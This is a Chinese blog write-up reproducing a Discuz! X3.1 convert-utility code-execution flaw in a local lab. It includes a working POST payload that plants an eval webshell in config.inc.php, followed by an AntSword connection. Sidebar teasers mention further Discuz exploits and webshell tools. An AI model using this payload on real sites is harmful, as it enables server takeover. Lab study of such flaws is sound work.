【漏洞复现】Discuz-x3.1 插件漏洞

最新推荐文章于 2023-05-15 17:41:42 发布
最新推荐文章于 2023-05-15 17:41:42 发布
阅读量1.9k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47443077/article/details/117310921
版权

Discuz-x3.1 插件漏洞

文章目录

一、漏洞背景

作为国内最大的社区软件及服务提供商,Comsenz旗下的 Discuz! 开发组具有丰富的 web应用程序设计经验,尤其在论坛产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术。使得 Discuz! 无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。

二、信息收集

本地IIS搭建Discuz-x3.1,发现不能直接访问

image-20210526122832856

进行漏洞信息搜集

利用百度、Google等搜索引擎搜集漏洞信息。这些漏洞信息在一些漏洞平台比如CSDN、补天等都可能有,很快便找到了可利用的信息:

192.168.64.132:8251/utility/convert

三、漏洞利用

直接访问http://192.168.64.132:8251/utility/convert/index.php

image-20210526124140207

发现漏洞所在页

用bp抓包,改变请求方式为POST,上传数据

a=config&source=d7.2_x2.0&newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

最后一句上传的数据为重中之重!!!

image-20210526125129013

访问该地址

http://192.168.64.132:8251/utility/convert/data/config.inc.php

image-20210526125449693

最后用蚁剑连接,连接密码为c

image-20210526133948800

最低0.47元/天 解锁文章
独角授
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
论坛社区曼虎discuz钩子 v3.1-hook-discuz3.1.zip
03-21
X3.1版本的插件或扩展,它提供了额外的功能和自定义选项,以增强论坛社区的用户体验和管理效率。Discuz! 是一个流行的开源论坛系统,由康盛创想(Comsenz)开发,广泛应用于中文互联网社区。 【描述】该压缩包文件...
Discuz开源论坛_v3.1系列_Sql注入漏洞详解
weixin_60708754的博客
05-12 1162
Discuz v3.1系列版本 Sql注入全流程详解
Discuz开源论坛_v3.4系列_远程代码执行漏洞详解
weixin_60708754的博客
05-15 4131
Discuz v3.4系列 远程代码执行漏洞全流程详解
Discuz! X3.1 后台代码执行
zyl404的博客
12-14 683
Discuz! X3.1 后台代码执行 漏洞描述 Discuz! X3.1后台存在任意代码执行问题,要后台权限。 实验步骤 一、访问后台地址: http://域名/admin.php 账号:admin 密码:admin123 二、编辑 全局 - 站点信息 - 网站第三方统计代码 比如在这里输入 <?php phpinfo();?>然后翻到页面的最下方提交。 三、更新缓存 点击 工具 - 更新缓存 - 然后点击确定 四、点击 门户 - HTML管理 - 设置 注意专题HTML存放目录(te
utility convert index.php,Discuz! x3.1的插件/utility/convert/index.php代码执行漏洞
weixin_36042436的博客
03-26 249
java入门第三步之数据库连接数据库连接可以说是学习web最基础的部分,也是非常重要的一部分,今天我们就来介绍下数据库的连接为下面学习真正的web打下基础 java中连接数据库一般有两种方式: 1.ODBC——Open Datab ...Module Zero之语言管理返回 概览介绍 如何开启 管理语言 管理本地化文本 概览介绍 ABP定义了一个健壮的UI本地化系统,它可用于服务端和客户端.它允许...
DiscuzML 3.x任意代码执行漏洞CNVD-2019-22239
千寻的博客
05-14 1234
文章目录0x01 简介0x02 漏洞概述0x03 影响版本0x04 漏洞编号0x05 漏洞分析0x06 环境搭建第一步 使用phpstudy搭建网站,第二步 解开源码压缩包,进行安装第三步 下一步第四步 运行环境选择全新安装第五步 填写数据库及管理员信息第六步 安装完成第七步 点击上方链接访问网站0x07 漏洞复现第一步 访问网站第二步 抓取数据包,进行数据包重放第三步 发包后出现phpinfo信息,证明漏洞存在。第四步 对漏洞进行利用,获取目标网站权限,第五步 管理工具进行连接0x08 漏洞修复免责声明
Discuz_X3.1_SC_UTF8
09-13
X3.1是一款深受用户喜爱的社区论坛软件,以其强大的功能、丰富的插件和易用性,广泛应用于各类网站。本篇文章将深入探讨如何在Linux(Nginx+MySQL+PHP)环境下,也就是LNMP架构上搭建Discuz! X3.1论坛。 一、LNMP...
论坛社区曼虎discuz钩子 v3.1-hook-discuz3.1.rar
最新发布
04-08
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...【项目质量】:所有源码都经过严格测试,可以直接...
Discuz_X3.1
01-09
X3.1》 Discuz! X3.1是一款备受推崇的社区网站建站应用,它以其强大的功能、易用性以及安全性深受广大用户的喜爱。作为官方下载版本,Discuz! X3.1为用户提供了安全可靠的建站环境,确保了社区运营无隐患,让站长...
Discuz_X3.1 X3.2版本正版插件破解文件
12-16
discuzX3.1 X3.2版本】安装应用后台出现“对不起,您安装的不是正版应用..”的详细解... 很多会员朋友在本网站下载好discuz 模板或者discuz插件上传到网站目录 在后台进行安装的时候会发现 “对不起,您安装的...
Discuz! X系列远程代码执行漏洞分析
weixin_33755649的博客
03-08 1160
tang3 · 2015/08/10 15:050x00 漏洞概述上周有一个朋友问我有没有办法在知道uc的appkey的情况下getshell,刚好我在原来看discuz代码时曾经有过几个相关的想法,但是一直没有仔细去看,接着这个机会去看了下,果然有个很好玩的代码执行漏洞。0x01 漏洞根源这个问题的根源在于api/uc.php文件中的updatebadwords方法,代码如下:#!php fun...
php 7.2.2bug,Discuz 7.2版本高危漏洞bug修复
weixin_42502775的博客
03-11 377
使用discuz建站的朋友们应该都知道,discuz现在已经更新到X3.2版本了,功能也和旧版本有了一些区别。小编今天在逛论坛看到一个关于discuz老版本的消息,说的是Discuz! 7.2 系列论坛程序中含有高危安全漏洞。内容如下:根据相关安全组织的报告, Discuz! 7 系列论坛程序中含有高危安全漏洞。为保障您的论坛数据不被破坏, 请各位站长立即进行修复或者防御,以免遭受到攻击。流动主要...
Discuz-3.1 ssrf漏洞利用操作
L18296069161的博客
12-20 512
渗透学习交流群:773617250,进群即可领取一套完整的学习工具,群内定期直播,可与老师互动,欢迎大家进群学习交流!感谢大家的支持! #001 环境搭建:  Phpstudy+win7搭建discuz漏洞环境  把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可  安装完成访问一波: #002 漏洞复现:  Centos7,临时关闭防火墙  ...
xss防御补丁_Discuz论坛最新dom xss漏洞的解决方法
weixin_28920823的博客
01-13 414
无忧主机小编在日常处理客户网站问题时,经常遇到网站因为程序漏洞出现的问题。网站安全的发展,才能使得管理者放心营运。但是比较无奈的是,漏洞问题貌似屡见不鲜,就算再强大、再常用的程序,都会有诸如漏洞的问题,如discuz。下面是我们今天要讲的漏洞:qq互联插件dom xss漏洞关于漏洞的描述:在JS字符串中,字符还可以表示为unicode的形式。即:单引号还可以表示为\u0027或\x27。由于没有过...
冰蝎 连接木马到反弹shell拿到权限全过程
hackzkaq的博客
11-25 1万+
一.冰蝎简介 什么是冰蝎 “冰蝎”是一个动态二进制加密网站管理客户端。 在实战中一代webshell管理工具“菜刀”的流量特征非常明显,很容易就被安全设备检测到。 基于流量加密的webshell变得越来越多,“冰蝎”在此应运而生。 一.冰蝎连接getshell方法 1.加入冰蝎特有的的PHP木马,(注意:使用一句话木马无法连接冰蝎),连接密码可以随意改动格式为md5 32为的前16为值 md5(admin)[0-16] <?php @errorreporting(0); session_start()
i春秋首届全国数据安全大赛部分复盘
热门推荐
weixin_48421613的博客
10-27 1万+
2022年10月25日,为期两日的数据安全大赛于i春秋平台线上举行,在王队长的领队下,团队三个屁民开始了有趣的解题之旅。题目分为四个类型,分别是“安全知识”、“数据分析”、“数据算法”、以及数据安全。时间有点短,再加上有里还有活要干,所以很多题也没有答完,这次由我代表大家给大家进行一个复盘。
10.27-这个真的是爆破
weixin_43460822的博客
10-27 353
题目内容: <?php error_reporting(0); session_start(); require('./flag.php'); if(!isset($_SESSION['nums'])){ $_SESSION['nums'] = 0; $_SESSION['time'] = time(); $_SESSION['whoami'] = 'ea'; } if($...
Feng Office3.7.0.5任意文件上传漏洞复现
红队是青春
01-27 399
Feng Office3.7.0.5任意文件上传漏洞
Discuz x3.1 utility/convert/config.inc.php漏洞get shell
灰蜗牛
09-26 7675
Discuz x3.1 utility/convert/config.inc.php漏洞get shell i 春秋 --- 竞赛训练 -- 这不是DZ?
discuz7.2 sql注入漏洞
06-02
为了避免这个漏洞,建议用户及时升级到最新版本的Discuz!,同时也应该加强系统的安全防护措施,如限制数据库用户权限、开启防火墙等。此外,还可以通过对用户输入数据进行严格的过滤和验证来避免SQL注入漏洞的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值